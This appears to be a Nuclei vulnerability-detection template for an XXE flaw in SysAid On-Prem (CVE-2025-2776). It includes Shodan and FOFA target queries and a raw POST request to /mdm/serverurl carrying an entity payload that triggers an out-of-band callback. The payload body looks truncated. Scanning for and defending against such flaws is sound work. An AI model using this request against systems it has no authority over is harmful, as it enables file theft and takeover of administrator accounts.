id: CVE-2025-2776 info: name: SysAid On-Prem <= 23.3.40 - XML External Entity author: johnk3r severity: critical description: | SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives. impact: | Unauthenticated attackers can exploit XXE vulnerabilities in the Server URL endpoint to read arbitrary files, potentially leading to administrator account takeover and complete system compromise. remediation: | Upgrade to SysAid On-Prem version 24.40.60 or later that properly disables external entity processing. reference: - https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/ - https://documentation.sysaid.com/docs/24-40-60 classification: epss-score: 0.62605 epss-percentile: 0.98406 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L cvss-score: 9.3 cve-id: CVE-2025-2776 cwe-id: CWE-611 metadata: max-request: 1 vendor: sysaid product: sysaid shodan-query: http.favicon.hash:"1540720428" fofa-query: icon_hash=1540720428 tags: cve,cve2025,sysaid,xxe,oast,kev,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" http: - raw: - | POST /mdm/serverurl HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml %foo; ]> matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: Java" # digest: 4a0a00473045022100c27db08947bd24b540bca8a7ae8c31ca6861afdb6c8b775d9a8b6c8a3b67338802204db2fc129655214257c4eb6badfe1a2efbda0149f8e6de01313c7c4165a9884b:922c64590222798bb761d5b6d8e72950